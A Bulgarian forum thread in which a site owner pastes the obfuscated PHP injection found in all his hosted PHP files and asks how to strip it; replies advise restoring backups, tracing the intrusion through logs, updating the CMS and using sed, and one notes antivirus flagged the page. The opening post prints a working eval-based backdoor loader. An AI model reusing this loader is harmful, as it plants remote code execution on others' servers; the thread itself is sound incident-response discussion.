Автор Тема: malware във всеки php файл  (Прочетена 2610 пъти)

bILLY

  • Участник
  • *****
  • Публикации: 159
  • Distribution: Red Hat 7
  • Window Manager: Windows 10
    • Профил
    • WWW
malware във всеки php файл
« -: Ное 15, 2014, 07:16 »
Здравейте, стана следното, на платения ми хостинг, където си хоствам около 11 сайта, явно е имало някаква атака и сега във всеки един php файл имам malware код, който ако тръгна да го отстранявам на ръка, ще ми отнеме седмици а и е безсмислен труд. Както и да е, просто преинсталирах някои cms-и, но не мога да преинсталиам всички, понеже някои съм правил доста редакции по кода. Имам едно около 2-3 хиляди php файла със този код. Някаква идея как да го премахна от всичките файлове наведнъж? Нямам пряк достъп до сървъра, с cPanel съм, а кода е следния:

Код:
<?php $gywdckaams = ']y4:]82]y3:]62]y4c#<!%x5c%x7825t::825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%5c%x78256~6<%x5c%x787fw6<%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%xx5c%x785c2^-%x5c%x7825hOh%x%x7825)Rd%x5c%x7825)Rb%xQUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%7654%x28%151%x6d%160%x6c%157%x64%145%x28%141%i#>.%x5c%x7825!<***f%x5c%x7827,hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%xx5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x55c%x787f_*#[k2%x5c%x7y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%xx5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^n#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]2739f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x786025r%x5c%x7878W~!Ypp2)%x5825j=tj{fpg)%x5c%x7825%x5c%127-UVPFNJU,6<*27-SFGTOBSUOSVUubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvro]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]3640hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x5c%x787f%x5c%x787f%x5c%x75c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44%156%x75%156%x61"])))) { vt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x782525bbT-%x5c%x7825bT-%x5c%x7825hW~%x59-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]35!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5x5c%x7825>U<#16,47R57,27R66,#%x5c%x782f%x5c%x7827pd%x5c%x78256<pd%x5c%x#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#!>!%x5c%x7824Ypp3)%x55#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5)!gj<*#k#)usbut%x5c%x7860cpV*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x782x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<25c%x7825))!gj!<*#cd2bge56+99386c6f+%x5c%x782f#%x5c%x782doF.uofuopD#)sfebfI{*w%x5c%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x78678256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]2745c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdofx5c%x782f%x5c%x7824)#P#-mfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7827860SFTV%x5c%x7860QUUI&b%x5c%x782jw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!22!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)825h>#]y31]278]y3e]81]K78:56985:6197x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hn%x7825tdz>#L4]275L3]248L3Px7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)x5c%x7825)euhA)3of>2bd%x5c%87f%x5c%x787f<u%x5c%x7825V%x5c%x782%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x78-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%xg:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.9j{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppdpd#)tutjyf%x5c%x7860opjudovg%x5c%x7c%x7825w%x5c%x7860%x5c%x785c^>Ewx72%162%x61%171%x5f%155%x61%160%x28%42%x66%1f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtc%x785c1^-%x5c%x7825r%5c%x7860{66~6<&w6<%x5c%xc%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x77{ftmfV%x5c%x787f<*X&Z&S{ftttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidkKe]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#0439275ttfsqnpdov{h19275j{hnpd19275fubmgo); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%1c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%xhmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]5c%x7825)sutcvt)!gj!|K)udfoopdXA%x5c%x7822)7!*3!%x5c%x7827!hmg%x5c%x7x7824%x5c%x782f%x5c%x78c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%8256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovgr%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x78tj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.m8y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5]82]y76]62]y3:]84#-!OVMM*<%x22%51%x#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utc%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbgsv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x<*2bd%x5c%x7825-#1GO%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5ctutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvgj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fub29%51%x29%73", NULL); }*K)ftpmdXA6|7**197-2qj%x5c%x78257-572]48y]#>m%x5c%x7825:|:5)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+52%x66%147%x67%42%x2c%163%x74%162%x5f%%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y77825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78ufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcx5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472%x5c%x785cq%x5c%x7825)uft|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%d]252]y74]256#<!%x5c%x77827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&%x7825)}.;%x5c%x7860UQPMSVDx5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281Lfujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#jm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>c%x7827!hmg%x5c%x7825)!gj!|!*1?4-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y8c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjux5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x525h!>!%x5c%x7825tdz)%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5e:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x%x5c%x7825j>1<%x5c%x7c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)uf787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%xx7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##%x7824<!%x5c%x7825mm!>!#]y81]273]y7*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<!%x5c%x7825bss%x5c%x785csboe))1%p%x5c%x7825!|Z~!<##!>!2p%x25kj:-!OVMM*<(<%x5c%x78e%x5c%x7825}&;ftmbg}%x5c%x787*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x78x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x7825b:<!%x5c%x7825c:>%x5c%%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%]6]283]427]36]373P6]36]73]83] chr(ord($n)-1);} @error_reporting(0q%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojep7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus$GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c39]271]y83]256]y78]248]y83]256]y81]265]y72]4-%x5c%x7824<%x5c%x7825j,,*!272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x7]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmif((function_exists("%x6f%142%x5f%1fsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782860{6:!}7;!}6;##}C;!>>!}%x5c%x7827;!>>>!}_;gvc0#W~!Ydrr)%x5c%x7825%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*?*2b%x5c%x7825)gpf{jt)!gj!825r%x5c%x7878B%x5c%x7x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825t-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%f!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c]y76]252]y85]256]y6g]25*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7FS,6<*msv%x5c%x78257-MSV,6<*)ujojRbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}Xqpt)%x5c%x7825z-#:#*%x5c%x78263%x74%141%x72%164") && (!isset($GLOBALS["%x61!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x75]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso5V<#65,47R25,d7R17,67R37,#%x5c%x782fq%%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr825w6Z6<.4%x5c%x7860hA*#npd%x5c%x782f#)rrd%x5c%x782f#00;quu7878:-!%x5c%x7825tzw%}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x)m%x5c%x7825):fmji%x5c%x7878:<##x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*25j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782.984:75983:48984:71]%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)dovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x78226#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%*e%x5c%x7827,*d%x5c%x7827,*c785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#0#%x5c%x785cq%x5c%x78257**^#zsfvr#]D4]275]D:M8]Df#<%x5cufh%x5c%x7860fmjg}[;ldpt%:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x786%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x56]258]y6g]273]y76]271]y7d]252]y74]25825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y}W;utpi}Y;tuofuopd%x5c%x7860f;!osvufs}w;*%x5c%x787f!>>%x5c%x78c%x7825<#762]67y]562]38y]%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%xc%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x782/(.*)/epreg_replacewfbygyoosu'; $dqywlseynr = explode(chr((132-88)),'7915,35,8661,46,1523,25,7444,61,7277,36,3859,59,374,43,3491,44,5219,38,314,60,4011,53,591,67,8490,56,9061,22,1793,32,7637,53,9951,43,2432,51,4521,46,5924,53,2258,46,2483,56,5855,69,1035,53,95,25,4921,34,4085,23,4833,65,7950,55,7761,60,8771,63,4216,64,976,59,9607,33,5582,25,4380,67,4621,70,3608,24,6617,48,5666,50,2009,63,8438,52,9263,50,946,30,8546,34,7206,42,8165,52,9194,37,570,21,8005,23,9864,28,9661,25,5471,56,5780,27,8707,64,8028,23,7011,28,9892,34,2883,37,4772,61,5421,50,1548,48,4108,25,34,61,2136,41,5369,52,6437,58,10054,52,4979,49,5977,31,3958,53,448,62,4064,21,2998,44,3424,35,7505,64,6789,36,8117,26,4691,21,7081,51,3135,27,2956,42,9083,37,417,31,9534,28,5028,57,5085,65,6961,26,7873,42,5150,69,2370,62,1317,65,225,24,2177,35,827,68,249,65,2782,33,1689,65,6573,44,3727,45,2663,45,720,57,8580,52,8367,48,9725,57,6140,52,9434,45,9686,39,3818,41,3387,37,6495,57,5318,51,4567,54,1981,28,1382,27,3162,35,3700,27,2732,50,8896,38,1754,39,7313,69,2232,26,1088,53,5716,64,4280,49,9141,53,7132,42,2212,20,1881,65,7569,68,8217,57,2815,68,777,50,8415,23,7821,52,8071,46,1631,58,4447,38,2600,63,6192,50,9231,32,5527,55,6359,50,9926,25,4955,24,6748,41,4712,60,6713,35,9782,36,9479,55,6242,69,9994,60,7382,62,8632,29,6008,62,2072,64,7733,28,5607,36,3068,67,6552,21,919,27,6665,48,3255,65,2539,61,0,34,1860,21,3632,68,161,37,9562,45,8051,20,4329,51,895,24,4156,60,510,60,3586,22,198,27,1409,64,120,41,8143,22,2920,36,3320,67,8992,69,9359,20,6825,35,5807,48,2304,66,9640,21,3042,26,6311,48,3772,46,7039,42,6409,28,1596,35,3918,40,1257,60,7248,29,1473,50,8834,62,6929,32,658,62,6860,69,9379,55,3197,58,1193,64,7174,32,1946,35,3459,32,1141,52,9313,46,3535,51,8312,55,8934,58,9120,21,2708,24,1825,35,8274,38,4133,23,6987,24,5257,61,5643,23,9818,46,7690,43,6070,70,4485,36,4898,23'); $xiojogczfb=substr($gywdckaams,(48065-37959),(38-31)); if (!function_exists('abajoffmfz')) { function abajoffmfz($jojpsamwxn, $dcvvadmras) { $vfnqhbwiek = NULL; for($gmzdmevbtt=0;$gmzdmevbtt<(sizeof($jojpsamwxn)/2);$gmzdmevbtt++) { $vfnqhbwiek .= substr($dcvvadmras, $jojpsamwxn[($gmzdmevbtt*2)],$jojpsamwxn[($gmzdmevbtt*2)+1]); } return $vfnqhbwiek; };} $lyicaonicy="\x20\57\x2a\40\x70\154\x75\151\x75\150\x66\161\x6a\155\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\65\x31\55\x31\61\x34\51\x29\54\x20\143\x68\162\x28\50\x34\64\x34\55\x33\65\x32\51\x29\54\x20\141\x62\141\x6a\157\x66\146\x6d\146\x7a\50\x24\144\x71\171\x77\154\x73\145\x79\156\x72\54\x24\147\x79\167\x64\143\x6b\141\x61\155\x73\51\x29\51\x3b\40\x2f\52\x20\142\x79\164\x66\160\x67\143\x62\166\x79\40\x2a\57\x20"; $qitxxevtmi=substr($gywdckaams,(41587-31474),(38-26)); $qitxxevtmi($xiojogczfb, $lyicaonicy, NULL); $qitxxevtmi=$lyicaonicy; $qitxxevtmi=(727-606); $gywdckaams=$qitxxevtmi-1; ?>
 

много е досадно и изнервящо, най-лесно е да се откажа и да зае*а всичко, но това не е решение. Трябва ми решение, някакъв php скрипт, който да търси и замества ? Примерно ? Някои да има някакви идеи ? Или от cPanela, някой полезел tool за премахване на malware код ? Мога и да се свържа с  отдел поддръжка на хостинг провайдъра, но не искам, защото знам какво ще направят ... вместо да ми съдействат, ще ми блокират акаунта, докато си изчистя злонамерения код от файловете.
« Последна редакция: Ное 15, 2014, 07:20 от bILLY »
Активен

"UNIX is like sex: If you don't know it, you don't miss it. But if you know it, you'll need it!"
Lars Eilebrecht

programings

  • Участник
  • *****
  • Публикации: 177
  • Distribution: Arch Linux, BunsenLabs Linux, FreeBSD
  • Window Manager: XFCE, MATE, Openbox
    • Профил
Re: malware във всеки php файл
« Отговор #1 -: Ное 15, 2014, 11:32 »
Обади им се, и кажи да ти apply-нат последния бекъп преди атаката.

Иначе е мъка, а и не знаеш дали не е скрит и по други файлове някой tricky-formatted backdoor със съкратени PHP тагове примерно, за да не бие на очи. Въобще трябва да приемаш всичките си данни за компрометирани.

То ако е било масова атака, би трябвяло те и без да им пишеш да apply-нат бекъпи на всички.
« Последна редакция: Ное 15, 2014, 11:34 от programings »
Активен

wfw

  • Участник
  • *****
  • Публикации: 245
  • Distribution: Debian
  • Window Manager: none
    • Профил
Re: malware във всеки php файл
« Отговор #2 -: Ное 15, 2014, 15:16 »
Освен това трябва да намериш начина, по който са ъплоаднали файловете. Виж кога са модифицирани и търси в лог файловете на апаче в този интервал дали има нещо интересно.

Доста е вероятно да е от бъг в ЦМС-а, щом не си ги ъпдейтвал...

Този хостинг дали няма SSH?
Активен

jet

  • Участник
  • *****
  • Публикации: 1786
  • Distribution: debian sid
  • Window Manager: kde
    • Профил
Re: malware във всеки php файл
« Отговор #3 -: Ное 15, 2014, 17:02 »
А ти самият нямаш ли бекъпи - или хостингите никога не се чупят.
Активен

Linux: From WTF to OMG

bILLY

  • Участник
  • *****
  • Публикации: 159
  • Distribution: Red Hat 7
  • Window Manager: Windows 10
    • Профил
    • WWW
Re: malware във всеки php файл
« Отговор #4 -: Ное 15, 2014, 21:11 »
ами нямам, а тия на хостинга всичките са с тоя малуер, понеже прекалено късно се усетих.
Активен

"UNIX is like sex: If you don't know it, you don't miss it. But if you know it, you'll need it!"
Lars Eilebrecht

NorthBridge

  • Участник
  • *****
  • Публикации: 177
  • Distribution: Slackware-current
  • Window Manager: Enlightenment E17
  • Mad Tinkerer
    • Профил
Re: malware във всеки php файл
« Отговор #5 -: Ное 15, 2014, 22:02 »
Колега, не се мъчи - разкарвай всичко и си качи нещата наново. Винаги можеш да пуснеш search & replace, обаче след такова изпълнение в 2-3к файла може да има и други кофти парчета код, и докато ги прегледаш всичките по-добре да почнеш отначало.

Преди всичко послушай wfw - разбери как са се намърдали вътре и запуши дупката.

Освен това винаги си дръж по едно копие от файловете които качваш (Git, Mercurial, SVN и така нататък) за да можеш при подобен случай отново просто да ги ъплоундеш наново и дотам. Едно-две копия на базата при теб също няма да навредят в допълнение към тези на сървъра.
Активен

I did a 'zcat vmlinuz > /dev/audio' and I think I heard God...

pennywise

  • Гост
Re: malware във всеки php файл
« Отговор #6 -: Ное 15, 2014, 22:19 »
За съжаление ще научиш колко са важни backup-те по трудния начин.
Активен

korea60

  • Участник
  • *****
  • Публикации: 189
    • Профил
Re: malware във всеки php файл
« Отговор #7 -: Ное 15, 2014, 22:28 »
А няма ли вариянт да свалиш всичко от хоста да пуснеш нещо от рода на:

sed -i '/<?php $gywdckaams =.*/ d' test/*.php (само примерно)

и после пак да ги качиш?
Активен

k0tka

  • Участник
  • *****
  • Публикации: 130
  • Distribution: Fedora 23, CentOS, Debian, OS X El Capitan
  • Window Manager: i3wm
    • Профил
Re: malware във всеки php файл
« Отговор #8 -: Ное 16, 2014, 10:26 »
Здравей,
Виждал съм много подобни случаи и проблема обикновенно е Joomla/Wordpress или други подобни системи. Чистил съм файлове със sed и знам каква е мъката ако нямаш работещ бекъп. Моето мнение е както е казал NorthBridge махай всичко наред, можеш да запазиш базата и да качиш чисти файлове, обикновенно не пипат в базата - това са автоматизирани скриптове, но не е 100% сигурно. Дори и да разкараш кода, който предполагам се намира на първия ред в файловете е много вероятно да има допълнителни js мизерии по други файлове или код различен от този който виждаш във всеки файл и си изчистил на пръв поглед. И щом става въпрос за 2-3 хиляди файла упражнението ти става още по-трудно.
След това е много важно да прегледаш за остарели софтуери, теми и/или (най-вероятно) плъгини тъй като в повечето случаи тези мизерии се случват през тях.
Активен

"If you need an instructional video telling your users how to turn a machine off (http://windows.microsoft.com/en-gb/windows-8/how-shut-down-turn-off-pc), there’s something seriously wrong with your design." --  Andrew Gregory @ linuxvoice

eXtreme

  • Участник
  • *****
  • Публикации: 4
    • Профил
    • WWW
Re: malware във всеки php файл
« Отговор #9 -: Фев 04, 2015, 13:04 »
След като отворих темата, AVAST засече PHP:BackDoor-FE [Trj]
 >:D
Активен

Моят уеб сайт: https://phonesreview.com

neter

  • Global Moderator
  • Участник
  • *****
  • Публикации: 3408
  • Distribution: Debian, SailfishOS, CentOS
  • Window Manager: LXDE, Lipstick
    • Профил
    • WWW
Re: malware във всеки php файл
« Отговор #10 -: Фев 04, 2015, 17:04 »
След като отворих темата, AVAST засече PHP:BackDoor-FE [Trj]
 >:D
Нормално е, съдържанието му е пуснато в първия пост на темата и твоят Avast го вижда в html-а на страницата. В случая е фалшива тревога ;)
Активен

"Да си добре приспособен към болно общество не е признак за добро здраве" - Джиду Кришнамурти

Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
malware в linux?
Системна Сигурност
gat3way 29 6332 Последна публикация Фев 21, 2009, 14:12
от ilian_BIOS